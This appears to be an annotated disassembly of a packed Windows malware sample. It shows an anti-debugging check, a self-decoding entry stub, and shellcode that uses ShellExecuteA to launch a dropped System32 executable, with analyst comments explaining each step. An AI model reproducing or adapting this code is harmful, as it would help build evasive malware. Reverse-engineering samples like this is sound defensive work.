22915746h, 0AD12FA38h, 40ADFA36h, 0ABFD88EAh dd 0F94C44A7h, 0A3994AC8h, 0D658A1C8h, 40952152h, 0AF89ADD7h dd 679B0FC0h, 
4CC609C2h, 0B4446A28h, 5A2D2107h, 0A68F2D6Ah dd 0A3152199h, 0D954A1CDh, 0CC54A159h, 9EC1AE97h, 37E41041h dd 40A0B3A3h, 0E25B814Ch, 0A7AB4B09h, 99CB3026h, 44895175h dd 9A47F254h, 0A9342FC9h, 38DD7B08h, 4AFEC131h, 4DC63631h dd 8A8E8B41h, 0E27837h, 44C95098h, 7605078Ch, 8BEDEF42h dd 90F41E6Fh, 0C91942C1h, 5004A7BDh, 9A6A9444h, 0ABEB5F9Bh dd 4C6C2189h, 71B474AFh dd 9D9D9F4Ah, 0A77C36DFh, 0D136896Fh, 0E0AB436Fh, 9D93D3E8h dd 34F80D42h, 993C8F6Bh, 0FE754D9Bh, 0C3AD5C74h, 180AAE99h dd 4490C6F6h, 0F7791C4Ch, 30CCA3BBh, 0EAC737BFh, 0A46446BAh dd 8BA52176h, 0AFA72E9Dh, 0BF436BA9h, 673B1679h, 17368E0Fh dd 0E7FAF8BCh, 0D549A0FBh, 51AFAFC0h, 0BDAF95E7h, 0ADB9BCB9h dd 0ACB1ACE7h, 0A6AF99C9h, 0A50BEE0Fh, 0A2B9ACACh, 0ACA7BBACh dd 89FBFAA5h, 0FAA96497h, 0CF75E409h, 7AAFC7ADh, 0FC99367Ah dd 0E7D1C0C3h, 0D333CDC0h, 0C2219D99h, 6549EF60h, 92ABE0D3h dd 0C58C4401h, 7AC1225Ah, 82BE9821h, 0AFAFBDAFh, 0D08542F5h dd 0FA02CAB1h, 7ADD443Fh, 42E998CAh, 171ACADBh, 0FBCE0908h dd 0F3498BCBh, 3FAFAE8Fh, 0F23CBC70h, 0BDD5ED8Dh, 0B8F28FCEh dd 514BBD1h, 4FED9842h, 0BBDD7EC6h, 0AFB6D5D4h, 0CAD58842h dd 59CD420Ah, 0A8400ACAh, 0E77585C9h, 19AF8DE7h, 0AEAD2F36h dd 0AF9D742h, 0D552C592h, 0C154D242h, 0F8CBA30Ah, 9FA79B3Dh dd 3AFD50Dh, 0DF22121Dh, 4824180Dh, 0AED59803h, 52503256h dd 0AFAFA1FDh, 1E701300h, 1F070415h, 701B02h, 2171F02h dd 61701D11h, 0AFAB479Dh, 111CA6E1h, 5A521D1Eh, 343E3907h dd 7023273Fh, 70223F36h, 7D865307h, 373B2F3Dh, 20253F22h dd 314A635Eh, 0E731D77h, 62B93C6Eh, 62627108h, 1E617E62h dd 56A97004h, 70488A3Bh, 0F420626Ch, 0EB23DBh, 5A57497Bh dd 173AF5Ch, 502DD333h, 445A4154h, 0EB845570h, 9AEB0BB8h dd 1B1C5039h, 50000303h, 0ABD2C706h, 58994E8Fh, 745007B0h dd 5034503Eh, 5027503Fh, 0A6A66A23h, 6024CB32h, 69DC5951h dd 53736550h, 4D14E6B6h, 8A50577Eh, 341E2951h, 8A7058FBh dd 0C234CAD7h, 7653CF07h, 3DD33098h, 17731651h, 23AF1057h dd 50565F73h, 4F514056h, 0B0D8DA45h, 0AF305018h, 501FB5AFh dd 3A49D114h, 19B4A22Ah, 60FF784Ch, 37402475h, 711FB103h dd 8F0C148Fh, 54506025h, 7DFE3BFFh, 0AED570Ch, 
0DD310C58h dd 1D258CDDh, 5066577Eh, 60277E68h, 8B2BFF31h, 0BC50194Bh dd 6B745013h, 7D33506Fh, 349F704Fh, 548C58F2h, 0B44E9210h dd 50AF46EFh, 5E508E8Eh, 51CF4650h, 67BF7652h, 78101231h dd 0DB415349h, 0E8388E9Bh, 8324893Ch, 7A335020h, 0EE12C68Bh dd 0CF753BCCh, 25185E40h, 546DD18Dh, 443044Bh, 0ABCF760Ah dd 933868Ch, 9B970C72h, 55D73515h, 0A3186B05h, 40535B50h dd 5140E818h, 64CFAFABh, 783A5155h, 0E15C6949h, 0F8CB4180h dd 891F9050h, 350FA57Eh, 0D4FA80Fh, 4CBBDAD8h, 0B8CF4199h dd 18407B6Ch, 0CF758130h, 0A45CBCDBh, 5CF030F3h, 295F705Ch dd 5CE15CF0h, 1EAFEE50h, 0D85CF0DEh, 50595010h, 505753BCh dd 19B14E91h, 1F1044C5h, 0EF10202Ch, 0E2792B72h, 43135750h dd 6FA0CE29h, 5043D528h, 0B9F60BFBh, 7FA84043h, 52239665h dd 735EAEAFh, 60918210h, 0D4586608h, 0B4A213D8h, 40E92D83h dd 0E851AFBEh, 0A2705C40h, 0FD296631h, 5F2F575Dh, 0B5CF7588h dd 20514845h, 0C0565FD4h, 5FD4295Fh, 52505FC5h, 0ACCE1DD7h dd 3C5FD42Fh, 98CA505Fh, 0F8D4FA8Eh, 9A43133Fh, 4FDC596Fh dd 83E39h, 6C220070h, 5090F68Bh, 69511416h, 996C3B62h dd 426CD41Fh, 11522545h, 2B725003h, 0C44CD45Dh, 0FFAFCB51h dd 9656BB4Ch, 23750C0Ch, 3320390Ch, 0CFD13674h, 0BCAFA92Fh dd 0B4AF574Ch, 14350350h, 37253235h, 3C392639h, 11353735h dd 0E2368B34h, 23253AAFh, 3B3F0424h, 23473E35h, 25423F1Ch dd 0C22F26ADh, 3C310620h, 47113525h, 3F78201Fh, 7FAE5C33h dd 642374E6h, 26343113h, 63392031h, 42B2FEB3h, 3524252Fh dd 43613D22h, 0EB533962h, 35F32F42h, 22040F45h, 69072931h dd 0BF22134Bh, 358BBD8Ch, 35024E31h, 4553F3Dh, 6445C38h dd 3E242239h, 25E686BDh, 378110Ch, 25F2815h, 0F163E22h dd 1B65862Ah, 1872A3A5h, 0D3000404h, 0D9217F8Eh, 0B627010h dd 5D1B1F70h, 8BAD515Ah, 3F1BADFDh, 7D52143Eh, 2437541Ch dd 75706A38h, 7931BD25h, 787F48CBh, 0A4E92904h, 763B2DE6h dd 393C20F7h, 4539D533h, 0F37D287Fh, 9B27BE88h, 3D3F337Dh dd 359D2220h, 0B8F0734h, 5084AF78h, 50041517h, 41345236h dd 8D7BADF1h, 3DC52387h, 0E1332623h, 3DF28D87h, 35512735h dd 0F625F58h, 0AD9C8CB6h, 64612547h, 5557A753h, 0CA393E57h dd 6162537Eh, 88436960h, 68E3C32Bh, 7356284Fh, 5CCB8C57h dd 1F606162h, 
2F2F2579h, 0EB70C8ABh, 2150305h, 1E581419h dd 50560819h, 18712B09h, 756AB8F1h, 95F79D34h, 3AFA2A6h dd 704161Fh, 0C150211h, 233F391Dh, 8D0C933Fh, 0E7D3A086h dd 2225130Ch, 98065922h, 0E50CAE23h, 293B112h, 2903EC25h dd 0A202C0ADh, 0B7F1D72Fh, 363407CAh, 3E382331h, 3423342Ah dd 2686423Ch, 27190343h, 0C076F31h, 5E8830F1h, 2DB693Ch dd 0E41B5D07h, 53CC7386h, 362170A5h, 0A75ED6BFh, 26703739h dd 68264BADh, 0CD623526h, 37E9E61Bh, 40037034h, 0E84B3514h dd 4471E267h, 4B47730Ch, 0CB620C6Fh, 12501CFBh, 0FCC1706Fh dd 6DCF4A65h, 0E04EEF73h, 5604FD12h, 391467C2h, 3DEBCE23h dd 36BE26C4h, 0CC3D377Fh, 3C7FA67Ah, 33743399h, 2924395Ah dd 3E311D70h, 895B94Eh, 61994AE1h, 95CDE4DCh, 2648326h dd 585E1103h, 0AFAFBFECh, 0F4914BAFh, 8D19CFDEh, 348B4F15h dd 5DB5E595h, 739BB2FAh, 3333C972h, 2348184Ch, 0BDAFAFAFh dd 0DCCA93A2h, 9C1DD506h, 83FD5FB1h, 67394556h, 0C8F8ADDDh dd 9E205B46h, 4415001Fh, 0A867AFAFh, 0BF621A69h, 8817FEB3h dd 0EAD48FEDh, 23D0674Eh, 5DA5DBD1h, 0C2B02D1Ah, 0B88FAFAFh dd 0E8957DAEh, 0D5B07096h, 38EDCCh, 0E6793Ah, 129364D2h dd 0C858412Fh, 0AFAFAFAFh, 0B7E7E24Ch, 27D9CDCCh, 83C74A6Dh dd 0DD0079F4h, 166AC6F5h, 42B8ACDDh, 0FF40BB46h, 0A8152014h dd 0AFAFAFBAh, 28C63A80h, 113CFE1h, 0D6F877BBh, 59DA6920h dd 0F192448Eh, 462A0391h, 0C7D594EFh, 0F08FF328h, 0C879B75Fh dd 3D9CECEh, 0C45774AEh, 0AFAFAFAFh, 25F3BC9Ah, 0A94DF14Eh dd 9B95E4B8h, 0A08B4A1Eh, 0D7693987h, 2BC4DC4Ah, 0D2434896h dd 1BEF6EE3h, 0A07FAFAFh, 0BB37B012h, 30E767E2h, 8788E3FAh dd 3554D072h, 0AF1BF62Ah, 15D508D6h, 0AC4BAFF6h, 0BEA93EA6h dd 62C09906h, 0E7F66B1Ah, 0BB83882Ah, 0C7BE1233h, 0A75448D8h dd 61000FB8h, 0F6CA539Ch, 0C8E4CA39h, 7C6C0828h, 39E29D64h dd 8C0EA844h, 6483E49Ch, 0C0F4831Dh, 5B3024D0h, 2112B93Dh dd 0B3D7ECFh, 3C8C5525h, 0F7380B74h, 0E750197Eh, 0C6E65D34h dd 3B957C7Dh, 314C37FDh, 8B51A03Eh, 7C25D688h, 2A3F7F22h dd 208B2932h, 1189FCECh, 0F4442232h, 0FD305C29h, 8293C75h dd 86371A68h, 9A3B16A1h, 237E31E6h, 0D4772528h, 3E976A66h dd 6D7E4616h, 3DD0E037h, 7F9A16DEh, 554C3C78h, 3764EB2Bh dd 413F204Ah, 43312A7Eh, 
9F4B3693h, 31AE6359h, 104A0F43h dd 373FDE3Eh, 273B2513h, 370DEDC0h, 4F24880Eh, 4FF53334h dd 0ACF9BB09h, 7D233F3Ch, 0F77E0831h, 3BFDE270h, 0FB25B30Bh dd 0EE32463Ch, 0E6EB756Dh, 2236E97Fh, 1A313C36h, 5EBC59AEh dd 31223763h, 24317E2Ah, 3D5BD1D0h, 2766D73Dh, 2DEB8A7Dh dd 4EB5FE3Ah, 33329B25h, 0EF373671h, 2F8B5BBAh, 3D3C3B3Ah dd 21203F3Eh, 27C22402h db 28h ; ( db 29h, 2Ah, 8Ah db 8 db 0AEh, 0Fh, 0A9h db 11h db 12h, 13h, 14h db 15h db 16h, 17h, 18h db 19h db 1Ah, 1Bh, 1Eh db 0ACh ; db 1, 7, 2Bh db 0F1h ; db 8, 10h, 4 db 4Ah ; J db 8, 9, 0Ah db 4Bh ; K db 0E8h, 0FDh, 0A5h db 2 db 0D1h, 0F0h, 27h db 68h ; h db 70h, 7Ah, 0E6h db 57h ; W db 0B9h, 10h, 71h db 52h ; R db 37h, 0DCh, 0AFh db 9Bh ; db 1Bh, 5Ch, 0A6h db 6 db 9Ah, 13h, 1Bh ; --------------------------------------------------------------------------- jo short loc_31508081 add [esi+3], dh lds edi, [esi] cmpsb xor al, 5Bh pop ds push ds pop ss assume ss:UPX0 pop edx pop ebx sbb [edi-4], ebp or eax, 656457AAh retn 1F1Ah ; --------------------------------------------------------------------------- dw 7F5Ch dd 4190501h, 74D13B3Fh, 172B064Ah, 0E6B5A736h, 24734133h dd 0D44729E5h, 90B0570Fh, 70F2529Bh, 0EE86A378h, 3253B80Dh db 34h ; --------------------------------------------------------------------------- loc_31508081: ; CODE XREF: UPX1:3150803Cj imul esi, [eax+64h], 19h adc eax, 59456670h ; CODE XREF: UPX1:3150809Dj push esi pop ebx pusha cld dec esi in al, 65h adc [esi+20h], al bsf edi, [ecx+50h] cmp esp, [edi] and [ebx+31h], edx jl short near ptr loc_31508085+4 sahf in eax, 0B6h ; Interrupt Controller #2, 8259A push edx sbb eax, 395F570Ch push ebx sub al, 42h pop eax out 39h, eax xor eax, 9743617Dh imul bl pop eax ficom dword ptr [ecx+ebx*2-385041F0h] scasd push ecx cmp al, 23h and al, 22h xor edi, ds:35171120h and al, 1Ch aas xor esi, [ecx] cmp al, 35h sbb [esi], edi db 36h aas pop edi or esp, [ecx] push es les eax, [ebx] add dl, [ecx+ebx*2] xor edi, [esi+15h] out 44h, eax das sub [ebp+7], eax or ds:8DA1716h, esi shl 
dword ptr [eax-32h], cl add al, 39h retf 0C7EDh ; --------------------------------------------------------------------------- db 0E9h, 3Dh, 5Eh db 5Bh ; [ db 4, 3Fh, 70h db 45h ; E db 0F0h, 35h, 0BDh db 5Ch ; \ db 50h, 16h, 11h db 5Ch ; \ db 0EFh, 12h, 6Ch db 0A6h ; db 5Dh, 6Fh, 1Dh ; --------------------------------------------------------------------------- aas xor al, 0FCh jge short loc_3150812F xor [esi-20h], eax retn ; --------------------------------------------------------------------------- db 7Dh, 11h, 0DEh dd 2E0E1139h, 56A45ABFh, 13598F4Fh, 4E29203Fh, 682BAEB4h ; --------------------------------------------------------------------------- retn ; --------------------------------------------------------------------------- cmp [esi], edi loc_3150812F: ; CODE XREF: UPX1:3150810Fj adc eax, 0D1013528h cmpsb scasd push esi mov ebp, 0CA3C3F2Eh and [ebx+62h], ah add edi, [esi] xor [eax], esp and edi, [eax] aas and al, 49h ; --------------------------------------------------------------------------- db 8Dh ; db 0FDh, 9Dh, 0F0h db 83h ; db 42h, 62h, 22h db 23h ; # db 5Fh, 4, 55h db 23h ; # db 0FDh, 11h, 96h db 65h ; e db 7Ch, 48h, 0A6h db 56h ; V db 0ABh, 0D0h, 71h db 1Eh db 35h, 28h, 24h db 38h ; 8 db 20h, 22h, 4 db 3Ch ; < db 9Bh, 37h, 28h db 15h db 26h, 58h, 0AFh db 31h ; 1 db 16h, 0DBh, 3 db 0E1h ; db 0E9h, 0E7h, 12h db 0B4h ; db 2Bh, 1Fh, 32h db 3Ah ; : db 0C9h, 44h, 14h db 0C6h ; db 37h, 43h, 5Ah db 9Fh ; db 45h, 0E7h, 1Ch db 31h ; 1 db 15h, 99h, 9Ah db 0FDh ; db 45h, 6Ah, 76h db 7Fh ; db 15h, 28h, 33h db 0E2h ; db 8Bh, 31h, 2Bh db 4 db 73h, 3Eh, 0Ch db 56h ; V db 35h, 20h, 35h db 0C7h ; db 7Ch, 59h, 0Fh db 41h ; A db 17h, 3Eh, 7Eh db 42h ; B db 3Fh, 0F0h, 88h db 6Fh ; o db 5Bh, 11h, 34h db 34h ; 4 db 22h, 5Fh, 44h db 1Ch db 39h, 32h, 22h db 78h ; x db 5Ch, 0E6h, 0D4h db 31h ; 1 db 0D9h, 7Bh, 1Dh db 75h ; u db 16h, 8Ch, 58h db 37h ; 7 db 4Fh, 0FBh, 0Fh db 35h ; 5 db 18h, 5Eh, 40h db 0C6h ; db 14h, 0D7h, 0CFh db 9Bh ; db 3Ch, 0B1h, 92h db 3Ch ; < db 46h, 4Dh, 
20h db 0F2h ; db 33h, 3Bh, 17h db 7Dh ; } db 81h, 31h, 3Dh db 25h ; % db 22h, 0B5h, 1Dh db 8Fh ; db 28h, 3Ch, 66h db 0D9h ; ; --------------------------------------------------------------------------- retn 94A3h ; --------------------------------------------------------------------------- db 5Dh ; ] db 3Ah, 0C8h, 15h db 0C8h ; db 61h, 49h, 5Eh db 32h ; 2 db 0D1h, 5Eh, 2Bh db 13h db 49h, 0B9h, 61h db 19h ; --------------------------------------------------------------------------- retn 8B33h ; --------------------------------------------------------------------------- db 26h ; & db 0D3h, 0B4h, 3Bh db 35h ; 5 db 34h, 5Ah, 33h db 43h ; C db 3Dh, 7Dh, 2 db 0Dh db 28h ; ( db 99h ; db 20h db 4Bh ; K db 6Ah ; j db 58h ; X db 15h db 2Ah ; * db 35h ; 5 db 76h ; v db 94h ; db 43h ; C db 0D6h, 0Eh, 6Dh db 50h ; P db 81h, 38h, 8 db 0F1h ; db 9Dh, 0BEh, 45h db 29h ; ) db 20h, 24h, 4Ah db 0E2h ; db 94h, 40h, 57h db 9Dh ; db 0E6h, 7Fh, 5Ah db 14h db 42h, 31h, 5Eh db 0BCh ; db 2Bh, 55h, 93h db 26h ; & db 39h, 36h, 29h db 16h db 37h, 9Ah, 6Ch db 85h ; db 46h, 0E0h, 0E7h db 0F1h ; db 40h, 0DFh, 7 db 3Fh ; ? 
db 29h, 7Ch, 41h db 3Dh ; = db 0D6h, 91h, 0EEh db 1Bh db 35h, 29h, 40h db 2 db 0E2h, 4Eh, 35h db 0A9h ; db 33h, 0D7h, 47h db 6Eh ; n db 0BFh, 44h, 11h db 33h ; 3 db 21h, 25h, 39h db 22h ; " db 46h, 4Ah, 0D7h db 5Dh ; ] db 1Dh, 19h, 0DFh db 0Ch db 24h, 0E6h, 0E9h db 9 ; --------------------------------------------------------------------------- cmpsd push 0FFFFFF91h aaa retn 0BF5Dh ; --------------------------------------------------------------------------- db 11h db 40h, 5Eh, 6Bh db 0C4h ; db 71h, 5Dh, 6Eh db 5Fh ; _ db 1, 0BCh, 0C0h db 0E0h ; db 86h, 5Ah, 65h db 41h ; A db 75h, 60h, 0C8h db 95h ; db 36h, 54h, 7Dh db 71h ; q db 40h, 0CEh, 0B1h db 0DEh ; db 15h, 0E5h, 0Fh db 11h db 32h, 39h, 0A5h db 3 db 38h, 1Dh, 93h db 16h db 44h, 0DBh, 0FFh db 3Eh ; > db 43h, 8Eh, 0A8h db 8Dh ; db 0B5h, 27h, 6Bh db 28h ; ( db 3Fh, 39h, 55h db 31h ; 1 db 3Eh, 23h, 39h ; --------------------------------------------------------------------------- loc_315082B4: ; CODE XREF: UPX1:315082E7j push esp xor edi, [edi+3F9BA6E6h] and ecx, [edi] ; CODE XREF: UPX1:31508322j ; --------------------------------------------------------------------------- db 15h, 18h, 0Fh ; --------------------------------------------------------------------------- and [esp+edx+130F5B37h], cl sub [eax], ch push 3C1AC876h sbb al, 0B7h sar dword ptr [ebx], 1 retn ; --------------------------------------------------------------------------- db 0D3h db 2Dh ; - ; --------------------------------------------------------------------------- xor bh, [eax] push edi and [ecx], ch adc bh, [edx+6Bh] jmp short loc_31508324 ; --------------------------------------------------------------------------- retf 9FB2h ; --------------------------------------------------------------------------- lea ecx, [edi] cmp [eax+63h], bh jns short loc_315082B4 imul eax, [edi+2224234Ch], 19565D41h or ebx, [ecx-1599C2C4h] loc_315082FA: ; CODE XREF: UPX1:3150835Dj pop edi cld and al, 0E7h out 89h, al ; DMA page register 74LS612: ; Channel 6 (address 
bits 17-23) cmp al, 0C4h mov ecx, 2327516Ch ; CODE XREF: UPX1:31508367j sub al, 0DBh and al, 36h dec ecx sal dh, cl dec ecx add cl, [ebx+35h] imul eax, [esi], 6AF2C138h aas inc esp mov [ebx+61h], bl xor esp, [esi+4Bh] jno short loc_3150837D jns short loc_315082BB loc_31508324: ; CODE XREF: UPX1:315082DDj cmp esi, esp rol dword ptr [ebx], cl sbb [edi+ebx], esi movsb add [ebx-78h], ch cmpsb mov al, 0DAh mul dword ptr [ebp+5] and edx, [ecx] inc ecx cmp al, 49h push ecx or ebx, [esi+1Eh] inc ecx dec ebx not byte ptr [esi+67h] or eax, 27C33EEBh add eax, [edi] test [ebp+20524F2h], edx xor al, 0F5h wait loop near ptr loc_315083D0+1 or eax, [edx+52h] pop eax and edx, [edx+5Dh] push ecx jl short loc_315082FA loop loc_315083DD imul edi, [edi], 0E247645Bh ; CODE XREF: UPX1:3150837Bj jl short near ptr loc_31508302+2 loop loc_315083C7 loc_3150836B: ; CODE XREF: UPX1:31508379j pop ecx push esp inc ebx inc eax add al, 9Fh push eax call far ptr 0A516h:15000746h jnz short loc_3150836B jg short near ptr loc_31508361+3 loc_3150837D: ; CODE XREF: UPX1:31508320j or eax, 53108377h lahf retf 4FBDh ; --------------------------------------------------------------------------- dw 5F50h dd 56515B51h, 4342645Ch, 0C8884D48h, 60B5512Bh, 8D5B6165h dd 5290597Ch, 205C573Bh ; --------------------------------------------------------------------------- ror ebp, 1 loc_315083A6: ; CODE XREF: UPX1:315083F5j jmp near ptr 71B4D220h ; --------------------------------------------------------------------------- db 57h dd 0E208B5DAh, 6B385356h ; --------------------------------------------------------------------------- loc_315083B4: ; CODE XREF: UPX1:315083ECj fcom qword ptr [edx+2F925126h] loc_315083BA: ; CODE XREF: UPX1:31508409j xor al, 0E0h push ecx dec esi or [ebx], al and eax, 53547EEAh arpl ax, ax loc_315083C7: ; CODE XREF: UPX1:31508369j xchg eax, ecx pop eax push esi db 64h xchg ax, sp nop db 67h cwde loc_315083D0: ; CODE XREF: UPX1:31508353j mov ebp, 7EB054A4h xor al, 0C0h stosd popf inc ecx inc 
edx ja short loc_31508437 loc_315083DD: ; CODE XREF: UPX1:3150835Fj db 3Eh or [eax], bl push 30509068h push eax sal byte ptr [ecx], 1 or esi, [eax+6Dh] push ebx jl short loc_315083B4 push ecx push eax push eax push eax push eax push eax push eax jo short loc_315083A6 push eax push eax push eax push eax push eax push eax push eax push eax push eax xor dh, ch push eax xor [eax], al popa fucomp st(6) push eax loopne loc_315083BA scasd pop es rcr dword ptr [ebp-3FBF4451h], cl rol al, 0C0h rol al, 0DAh push esi push ss fcom dword ptr [edi+17h] push ecx mov esp, ds:0D34EDB57h mov esi, 228B41ACh mov ebp, 505051E8h push eax push ecx mov esp, ds:0D34EDB57h loc_31508437: ; CODE XREF: UPX1:315083DBj mov esi, 418B41ACh nop push ecx mov esp, [ebx] mov edi, 4EDB5925h sar dword ptr [esi+238B41ACh], cl mov ah, 61h cdq sar dword ptr [eax-6EA2DDADh], cl mov al, 58h ficom dword ptr [esi+16h] shl dword ptr [eax-26DBDB51h], cl xchg eax, ebp push ecx mov esp, ds:0D34EDB57h mov esi, 418B41ACh cdq push ecx mov esp, ds:0D34EDB57h mov esi, 418B41ACh cdq and eax, 8B511170h and eax, 0D34EDB57h mov esi, 418B41ACh cdq push ecx mov esp, [ebx] mov edi, 4EDB5925h sar dword ptr [esi+238B41ACh], cl ; CODE XREF: UPX1:315084DDj mov ah, 0D3h xchg eax, ecx push edx shr dword ptr [ebp-50505CB0h], 1 ; CODE XREF: UPX1:315084F6j rol dword ptr [ecx+7F44DD51h], cl shr dword ptr [ebp-25A0D954h], cl push edx adc bl, al push edi pop ss assume ss:nothing sbb ds:0AF33B9A7h, esp scasd scasd rcr bl, 52h rcl dword ptr [edx-2CA826ACh], cl xchg eax, edi push esp sar dword ptr [ecx+51A12754h], cl lahf mov ecx, 0AFAFAF1Ch push cs fldenv byte ptr [edi+50509AE9h] push eax ficom dword ptr [edi+17h] jl short near ptr loc_31508492+5 insb push ecx daa cmpsd shr byte ptr [edi+51h], 1 and eax, 0DA57DBA2h andps xmm6, oword ptr [esi] xchg eax, ecx mov eax, 40909158h setalc xchg eax, esp jns short near ptr loc_3150849C+4 sar byte ptr [ebx-265FAE48h], 1 push edi rcl dword ptr [edi-4D7726ABh], cl mov ebp, ebx out dx, al push eax xor 
[eax+50h], dl fist dword ptr [edi+59h] nop and al, 15h fisttp dword ptr [edi] push esp fst st(4) pusha push eax rcl byte ptr [eax+50h], 1 push ecx mov ds:5897D300h, eax scasd mov ah, 0D0h push eax push eax ; --------------------------------------------------------------------------- db 0C5h ; db 0DAh, 57h, 17h db 58h ; X align 2 dw 8C24h db 0D9h ; db 0A9h, 29h, 57h db 5Fh ; _ db 0E7h, 57h, 17h db 0 db 17h, 0E9h, 7 db 18h db 0A2h, 0FEh, 5 aPPpyrWSUtIpPp1 db 'PPY$WSӓTPP1ǯPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP' db 'PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP' db 'PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP',0 align 1000h UPX1 ends ; Section 3. (virtual address 00009000) ; Virtual size : 0000B000 ( 45056.) ; Section size in file : 0000B000 ( 45056.) ; Offset to raw data for section: 00009000 ; Flags E00000E0: Text Data Bss Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX2 segment para public 'CODE' use32 assume cs:UPX2 ;org 31509000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dd 3 dup(0) dd 90C4h, 908Ch, 3 dup(0) dd 90D1h, 909Ch, 3 dup(0) dd 90DEh, 90A4h, 3 dup(0) dd 90E9h, 90ACh, 3 dup(0) dd 90F4h, 90B4h, 3 dup(0) dd 9100h, 90BCh, 5 dup(0) dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0 dd 77DD189Ah, 0 dd 77C48D44h, 0 dd 77D4C96Ah, 0 dd 7620AFB6h, 0 dd 71AB1A6Dh, 0 dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 69730000h dd 6Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h dd 6E65704Fh, 41h, 26h dup(0) dword_31509200 dd 59E85Bh, 648B0000h, 0EBB80824h, 0EB000004h, 
0A16764FAh ; DATA XREF: UPX2:315092FEo
; NOTE(review): the dwords of dword_31509200 are code that IDA left as data.
; Read little-endian, they contain 64 67 A1 18 00 / 8B 40 30 / 0F B6 40 02 /
; 83 F8 00 / 75 3C, which decodes as
;   mov eax, fs:[18h] ; mov eax, [eax+30h] ; movzx eax, byte ptr [eax+2] ;
;   cmp eax, 0 ; jnz ...
; i.e. a read of the PEB BeingDebugged byte (debugger check). Confirm by
; converting the region to code in the disassembler.
                dd 408B0018h, 40B60F30h, 0F88302h, 0E83C75h, 5D000000h
                dd 2320ED81h, 858B0040h, 402367h, 236F8503h, 0F08B0040h
                dd 236B858Bh, 85030040h, 40236Fh, 33FE8B50h, 8532ACC9h
                dd 402377h, 8D3B41AAh, 402373h, 2BC3EF7Ch, 30FF64C0h, 0B8208964h
                dd 12345678h, 60000387h, 84000000h, 0
                db 50h ; P
                db 31h, 0, 26h
                db 0
                align 2
; NOTE(review): 50 E8 4F plus the alignment padding looks like
; push eax / call +4Fh. The call would push the address of the 'shell32.dll'
; string that follows and land 4Fh bytes later, just past the three strings
; and the alphabet filler (12 + 14 + 31 + 22 = 4Fh bytes).
                dw 0E850h
                db 4Fh ; O
                align 4
; The next bytes spell 'shell32.dll',0.
                db 73h ; s
                db 68h, 65h, 6Ch
                db 6Ch ; l
                db 33h, 32h, 2Eh
                db 64h ; d
                db 2 dup(6Ch), 0
aShellexecutea  db 'ShellExecuteA',0
; Dropped-file path used by the stub below; useful as a host indicator.
aCWinntSystem32 db 'C:\WINNT\System32\QWe1851K.exe',0
; ---------------------------------------------------------------------------
; Launcher stub.
; NOTE(review): the 21 single-byte instructions from "inc esi" to "pop edx"
; encode as 46h..5Ah, the ASCII run 'FGHIJKLMNOPQRSTUVWXYZ', and
; "add [edx+52h], bl" encodes as 00 5A 52. If the 00 terminates that filler
; string, the real instruction stream starts at the 5A: pop edx / push edx,
; followed by the listed "push edx". edx would then hold the address of
; 'shell32.dll' pushed by the call above.
                inc esi
                inc edi
                dec eax
                dec ecx
                dec edx
                dec ebx
                dec esp
                dec ebp
                dec esi
                dec edi
                push eax
                push ecx
                push edx
                push ebx
                push esp
                push ebp
                push esi
                push edi
                pop eax
                pop ecx
                pop edx
                add [edx+52h], bl
                push edx
; Hard-coded absolute API addresses: these only work on the exact OS build
; they were taken from. Called with the 'shell32.dll' pointer on the stack,
; so presumably LoadLibraryA - confirm against that build's kernel32.
                mov ebx, 77E7D961h
                call ebx
                pop ebx
                push ebx
                add ebx, 0Ch                    ; +0Ch = offset of 'ShellExecuteA' after 'shell32.dll',0
                push ebx
                push eax                        ; module handle returned above
; Second hard-coded address, called with (module, name): presumably GetProcAddress.
                mov ecx, 77E7B332h
                call ecx
                pop edx
                push 1
                push 0
                push 0
                mov ecx, edx
                add ecx, 1Ah                    ; +1Ah = offset of the C:\WINNT\System32\... path string
                push ecx
                push 0
                push 0
                call eax                        ; resolved 'ShellExecuteA': runs the file named above
                mov eax, offset dword_31509200
                jmp eax                         ; continue in the code stored at dword_31509200
; ---------------------------------------------------------------------------
                align 4
                dd 7DDh dup(0)
                db 2 dup(0), 21h

; =============== S U B R O U T I N E =======================================

; PE entry point: a byte-wise decoder stub.
; It builds the key 0B3h in edx by counting, locates itself with call $+5 /
; pop, then subtracts the key from 243Ch bytes starting 25h bytes past the
; popped address, and finally jumps to the start of that region with all
; registers restored.
                public start
start           proc near

var_8           = dword ptr -8

                pusha
                sub edx, edx
                sub ecx, ecx
                mov cl, 0B3h

loc_3150B286:                           ; CODE XREF: start+8j
                inc edx                         ; after the loop edx = 0B3h (key, built without an immediate)
                loop loc_3150B286
                call $+5                        ; push own address (position-independent addressing)
                pop ecx
                add ecx, 25h                    ; ecx -> first byte to decode
                mov esi, 243Ch                  ; number of bytes to decode
                push ecx

loc_3150B29B:                           ; CODE XREF: start+2Aj
                xchg al, [ecx]
                sub ax, dx                      ; only al is stored back: byte = byte - 0B3h
                mov [ecx], al
                add ecx, 1
                dec esi
                cmp esi, 0
                jnz short loc_3150B29B
                pop ecx
                mov [esp+20h+var_8], ecx        ; overwrite the saved-ecx slot of the pusha frame
                popa                            ; ecx now = start of the decoded region
                jmp ecx
start           endp

; ---------------------------------------------------------------------------
                align 4
; Body entered after decoding. eax = own address (call $+5 / mov eax,[esp]);
; all data is addressed relative to it. ebx is loaded from [esp+4], the
; caller's return address, and later used as the start of a downward memory
; scan for a PE image.
                call $+5
                mov eax, [esp]
                test dword ptr [eax+242Bh], 80000000h ; flag dword; meaning of bit 31 not visible here
                mov [eax+29ACh], ebx            ; save caller's ebx
                mov ebx, [esp+4]
                jz short loc_3150B2FF
                cld
